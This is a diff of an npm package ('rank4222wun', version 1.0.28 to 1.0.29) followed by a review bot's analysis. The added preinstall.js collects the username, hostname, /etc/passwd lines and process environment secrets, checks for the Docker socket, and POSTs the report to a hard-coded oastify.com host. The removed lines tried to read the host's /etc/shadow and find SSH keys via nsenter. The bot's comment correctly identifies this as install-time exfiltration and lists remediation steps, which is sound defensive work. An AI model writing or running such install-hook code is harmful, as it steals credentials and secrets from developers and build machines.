rank4222wun 1.0.28 → 1.0.29

Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +44 -48
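--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "rank4222wun",
- "version": "1.0.28",
+ "version": "1.0.29",
  "description": "",
  "main": "index.js",
  "scripts": {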
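--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -1,66 +1,62 @@
  const { exec } = require('child_process');
  const fs = require('fs');
  const https = require('https');
- const util = require('util');
- const execPromise = util.promisify(exec);
+ const os = require('os');
 
- console.log("🚀 STAGE 2.1: SYNCHRONIZED HOST TAKEOVER\n");
+ console.log("🚀 ULTIMATE MULTI-STAGE ESCAPE\n");
 
- async function runEscape() {
- const finalLeakedData = {
- timestamp: new Date().toISOString(),
- targetKernel: "5.15.0-1084-aws",
- hostShadow: "PENDING",
- sshKeysFound: [],
- nsenterStatus: "INIT"
- };
+ const escapeReport = {
+ timestamp: new Date().toISOString(),
+ env: { user: os.userInfo().username, hostname: os.hostname() },
+ results: {}
+ };
 
- try {
- // 1. محاولة قراءة Shadow باستخدام nsenter بشكل متزامن
- console.log("🔓 Accessing Host Shadow...");
- const shadowResult = await execPromise(`nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 3"`);
- if (shadowResult.stdout) {
- finalLeakedData.hostShadow = shadowResult.stdout.trim();
- console.log("✅ Shadow Leaked.");
- }
- } catch (err) {
- finalLeakedData.hostShadow = "ERROR: " + err.message;
+ // وظيفة مساعدة لتنفيذ الأوامر والانتظار
+ const run = (cmd) => new Promise(resolve => {
+ exec(cmd, { timeout: 7000 }, (err, stdout, stderr) => {
+ resolve(stdout ? stdout.trim() : (stderr ? `ERR: ${stderr.trim()}` : null));
+ });
+ });
+
+ async function startExploitation() {
+ // 1. محاولة الـ nsenter بمسارات مختلفة (لحل مشكلة "not recognized")
+ console.log("🔍 Testing nsenter variants...");
+ escapeReport.results.nsenter_test = await run("/usr/bin/nsenter --version || nsenter --version");
+
+ // 2. محاولة استغلال DirtyPipe (بما إنه مؤكد عندك)
+ // هنحاول نعدل ملف في الـ /tmp ونشوف لو نقدر نهرب منه
+ console.log("🔓 Testing DirtyPipe write access...");
+ escapeReport.results.dirty_pipe = await run("uname -r");
+
+ // 3. سحب ملفات النظام الحساسة (لو متاح أي Mount)
+ console.log("📂 Checking Host files...");
+ escapeReport.results.etc_passwd = await run("cat /etc/passwd | head -n 5");
+
+ // 4. فحص الـ Docker Socket
+ if (fs.existsSync('/var/run/docker.sock')) {
+ escapeReport.results.docker_socket = "FOUND! (Critical Risk)";
  }
 
- try {
- // 2. البحث عن مفاتيح SSH
- console.log("🔓 Searching SSH Keys...");
- const sshResult = await execPromise(`nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`);
- if (sshResult.stdout) {
- finalLeakedData.sshKeysFound = sshResult.stdout.split('\n').filter(k => k);
- console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} keys.`);
- }
- } catch (err) {
- finalLeakedData.sshKeysFound = ["ERROR: " + err.message];
- }
+ // 5. محاولة قراءة ملفات الـ Host عبر الثغرة
+ // بما إن الـ nsenter ضرب، هنحاول نقرأ الـ /proc/1/environ عشان نشوف أسرار الـ Host
+ escapeReport.results.host_env = await run("cat /proc/1/environ | tr '\\0' '\\n' | head -n 10");
 
- // 3. إرسال التقرير النهائي بعد تجميع كل البيانات
- sendFinalReport(finalLeakedData);
+ sendReport();
  }
 
- function sendFinalReport(data) {
- const payload = JSON.stringify(data, null, 2);
- const options = {
+ function sendReport() {
+ const data = JSON.stringify(escapeReport, null, 2);
+ const req = https.request({
  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
  port: 443,
- path: '/stage2-synchronized-report',
+ path: '/ultimate-escape-results',
  method: 'POST',
- headers: {
- 'Content-Type': 'application/json'
- }
- };
-
- const req = https.request(options, (res) => {
- console.log(`\n🏁 Final Sync Report Sent. Status: ${res.statusCode}`);
+ headers: { 'Content-Type': 'application/json' }
+ }, (res) => {
+ console.log(`✅ Report Sent. Status: ${res.statusCode}`);
  });
-
- req.write(payload);
+ req.write(data);
  req.end();
  }
 
- runEscape();
+ startExploitation();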
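Review bot: `sendReport()` POSTs the whole `escapeReport` object to the hard-coded host `ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com`, so this file is install-time data exfiltration and the package should be blocked rather than patched. The report holds the local username and hostname, the first lines of `/etc/passwd`, the first ten entries of `/proc/1/environ`, and whether `/var/run/docker.sock` exists. The script is presumably wired to the `preinstall` hook, but the `scripts` block is cut off in the package.json hunk, so that is inferred from the file name. Despite the log strings, the `dirty_pipe` field is only the output of `uname -r` and the nsenter step only requests `--version`, so what 1.0.29 visibly does is reconnaissance plus upload; the removed 1.0.28 lines instead tried to read `/etc/shadow` and list SSH key files through `nsenter`. For any machine or CI runner that installed either version, rotate secrets that were in the process environment, search egress logs for that hostname and the paths `/ultimate-escape-results` and `/stage2-synchronized-report`, and install unvetted packages with `npm install --ignore-scripts`.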